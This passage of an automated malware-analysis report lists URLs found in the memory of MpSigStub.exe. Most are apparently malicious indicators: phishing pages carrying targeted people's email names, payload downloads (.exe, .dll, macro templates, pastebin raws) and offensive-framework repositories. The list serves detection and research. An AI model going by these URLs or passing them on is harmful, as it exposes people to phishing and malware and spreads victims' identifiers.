Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=erdinc.gok
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=mike.platt
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://n9.cl/d9fii
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: https://navigator.fun/wp-content/plugins/refer-a-friend-for-woocommerce-by-wpgens/public/js/mcb8abrb
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://netorgft3012202.sharepoint.com/:b:/s/investments/ewhzfsivbvbdn1vhk8eejpcbnbcaan_xlbd5e7fn2lp
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://neuroconversions.com/wp-content/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://neuroconversions.com/wp-content/plugins/po4/excelz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	String found in binary or memory: https://neverlose.cc/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://newsiest-grid.000webhostapp.com/dhl/dhla/dhl%20auto/index.php?email=kani.junichi
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: https://newtrp.com/e8/rexifly.php
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://newwets.com/zip/document.php
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://nhacaiuytin888.com/mail/now.php
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://nicoleiman.com/zmxvcmvuy2lhqhnpbxrly2guys1zdgfylmvkds5zzw==
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: https://nonamesv.xsiazon.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: https://notafiscaleletronica-e.com/master/
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: https://notes.topix21century.com/asp/kys_allow_get.asp?name=getkys.kys
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://novaworld-resort.com/wp-admin/user/delis/ite1/links.doc
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://nowfoundation.org.uk/hx0smmmbiw/haurt.html
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://oauth2.googleapis
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.uk-london-1.oraclecloud.com/n/lrxg46lu57ma/
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.us-ashburn-1.oraclecloud.com/n/idb0azuxzsop/b/viperwee/o/voicee.mp3
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.us-phoenix-1.oraclecloud.com/n/axfwptiilgjl/b/azu/o/vn.html#support
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exe
Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exeac
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://oemands.dk/xmlrpc.php
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://office.com/start/myaccount.aspx
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://office.insureusun.com/?e=simona.merzagora
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://office.live.com/start/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://office365.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://ohgstd-adnazad.c9users.io/update/validate/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://oidblueprin.at/3/str.dll
Source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp	String found in binary or memory: https://oksearch.org/xa2/click.html
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: https://olisseytravel.az/wp-content/themes/themesnewsa/js/zxz/new.php
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://olympiacus.accesscam.org/pdf/opo.php
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: https://one.co.il
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download.aspx?cid=7df9938cb8d94df3&authkey=%21ajy8jfax0aqsibs&resid=7df993
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://onestoprnd.com/wp-content/plugins_new/1902/next.php
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://onlinebebeksepeti.com/puyo/
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://opposedent.com/css/main.css/send.css
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://organigrama.gualda.com
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://ostoja.tk/browser.php
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://ourcomm.co.uk/wp-content/plugins/buddyboss-platfo
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office.com/api/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://ov.m4sh-up1x.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: https://ovjdyp9iz3r.typeform.com/to/kpapmnfe
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://ozmontelectrical.com/drms/fert.html
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://paf.gov-mail.net/13621/1/18844/2/0/0/1390324815/files-b74d99d6/hta
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://panolinuk-my.sharepoint.com/:b:/g/personal/paul_holland_panolin_co_uk/eewdyq0-yzdfhxzreappqk
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/d/n9jsq/0
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/r/26jiy/0
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/r/c9fe4/0
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/r/cikn9/0
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/2STTYftz
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/G0jcGs79
Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/g10EQ6PS
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/sf3gviaw
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: https://pastebinp.com/raw/1Tuj3CF7
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: https://pastebinp.com/raw/itDEZ39X
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://paxful.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://pay.2go.com/payment/2-1301222-qoo1mwri7zqbuxa2)
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://pay.yac.mx
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://pay.yac.mxx:
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://pd.gy-lnoice.online/?e=dskodras
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: https://peregrineplastics-my.sharepoint.com/:o:/g/personal/bsmith_peregrine_build/erg-sjvfekzmix8xbx
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://personalizasp.com.br/wp-admin/maint/redirect/
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://petlineir.com/mason/amstream.exe
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: https://photofinderplus.com/s/?api=
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://picsum.photos/80
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://piedmontrescue.org/sport/rockstar.php
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://pigeonious.com/
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: https://pigeonious.com/img/
Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	String found in binary or memory: https://pinkconnext.com/ds/26.gif
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: https://piscineconstruct.ro/kjy/index.php
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: https://pjoao1578pro2.site/crypt/vbscript.txt
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: https://playmesadelsol.com/wp-content/off/rt35.exe
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://plectrum.sebdelaweb.com/mnmn/index.php
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://poOsKYsdcast.oigaprofe.com.mx/wp-includes/sodiumOsKYs_comOsKYspat/src/Core32/ChaCha20/KlrIU4
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://podcast.oigaprofe.com.mx/wp-includes/sodium_compat/src/Core32/ChaCha20/KlrIU42g.php
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.pw/files/
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://postotravessia.com.br/wp-admin/network/redirect/
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: https://ppam.sslblindado.com/pande.html
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://preoccupationology.com/thisshit
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://pressionism.xyz/bbc.exe
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://pro-fit.pk/exploit.exe
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://producingemotions.es/settlementstatements242019/cgi-bin/office/index.html
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://produsedecalitate.ro/request.php
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://profdocame.co.vu/1/wp-config/storage/web.app.delve/access/draw9901/8269380-attachment-micros
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://property.appskeeper.com/wp-content/plugins/lite-cache/3Rx12s64qbadA.php
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: https://provodi.com/snn/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://prt.phosagro.ru/oa_html/rf.jsp?function_id=16181&resp_id=-1&resp_appl_id=-1&security_group_i
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://ps.ks-voicemail.online/?e=richana.nelson
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: https://ps.outlook.com/powershell-liveid
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: https://psychedelicassistedsessions.com/f2ewq5kfmdhcsac.exe-o%appdata%
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://ptpb.pw/jj9a
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: https://pubupl.com/updates/
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://pwndrop.gumtreeza.com/upywreoz/zma.exe
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://pxlme.me/cytyoc4h
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: https://pypi.python.org/packages/source/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://queentour.co.id/z/s.dot
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://quirky-blackwell.23-227-196-69.plesk.page/mail/inbox%3dmessage/1/index.php
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://r0lls-r0yce.com/eft/remit.dotm?raw=true
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://rachelzy.com/yyyy/myoriginlogger.exe
Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	String found in binary or memory: https://radh.ga/konzo/change.php
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://raifeisen.co/invoice/id/305674567
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: https://ramashardware.co.za/
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://ramblerimport.com/hz4uhlut5au/yu.html
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://ramechanicsplus.work/manuel/ywrhbwtvdmfaa2vtcgvylmv1
Source: MpSigStub.exe, 00000023.00000003.6317551345.0000028BD6CD2000.00000004.00000001.sdmp	String found in binary or memory: https://rapid.cerner.com:8243/clientapi/v1.0/clients/mnemonic/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/aybiota/mpbh33775/gh-pages/g9wl5dp.ttf
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/elevenpaths/ibombshell/
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/empireproject/
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/powershellmafia/powersploit/
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/sharkush/test1/master/calcush.sct
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/wmitoapi/test/master/compiler.zip
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: https://rawcdn.githack.net/up.php?key=5
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://rb.gy/kc5b5e
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: https://rb.gy/kc5b5e?#ncota
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://rcimshop.com/wp-config-server.php
Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://realmjoin-backend-staging.azurewebsites.net/api/system/check
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://referralpays.com/aki2root/uzie/actions.php
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://register.hiramhousecamp.org/miouadthen/po1820.zip
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: https://relaja.me/qw5hlk1vcmvqb25azglzywdydxbvlmvz
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://relaja.me/u2viyxn0awfulln0sm9obkbtzxryb2jhbmsucgxjlnvr
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://remote.bittorrent.com
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://remoteally.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://reneerouleau.us/az/az.doc
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://rewardamericanexpress.blob.core.windows.net/aexp/online.americanexpress.com0smyca
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://rezultmedia.com/css/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://rezultmedia.com/vendor/laravel/tinker/src/reportexcelnew.php
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://ringco.com.co/cache/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://rnatrixblade.net/nj.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://rollingrockcolumbia.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: https://rootca.allianz.com/aapplet
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://rotf.lol/3u6d9443
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://rw.mousewinning.club/?
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080008.xml
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080009.xml
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/900/10010045.xml
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/appPrefId/affPrefId.xml
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: https://s1.ax1x.com/2020/04/28/J4Zp9S.png
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://s15events.azure-automation.net/webhooks?token=
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: https://s18.picofile.com/d/8435906618/a27ddc7a-8599-479b-9e19-f2fd4b1988c3/setup.exe
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: https://s3-ap-northeast-1.amazonaws.com/update-secure/asmsgrbarb.zip
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://s3-eu-west-1.amazonaws.com/adkooo/
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/exec459/exec.tgz
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://s3.us-east-2.amazonaws.com/cotazion.pago/recibo.html
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://sad-goldwasser.62-108-34-75.plesk.page/doc00289?
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://scabraldealdun.com/hghgh/aridonorigin.exe
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: https://scalet.publicvm.com/large2/next.php
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: https://scaricapag.win/eco
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://sddfdfdf.typeform.com/to/vrfwamwx
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://secure.hotbar.com/
Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: https://secure.logmeinrescue.com/
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: https://secure.tibia.com/account/?subtopic=accountmanagement
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: https://secured-links.org/connect
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://secureloginauth.ru/mcavy/.dave.php
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://securezalink.com/home.jpg/security.ocx
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://seeing.mm.am/deluxe/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://selmersax.de/wp-content/themes/rehub/bpge/front/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: https://semalt.com/popups/popup_wow.php?lang=en
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://serv.fkn-srv.xyz/?e=tom.hughes
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://server.voiplogger0365.xyz/?e=csizemore
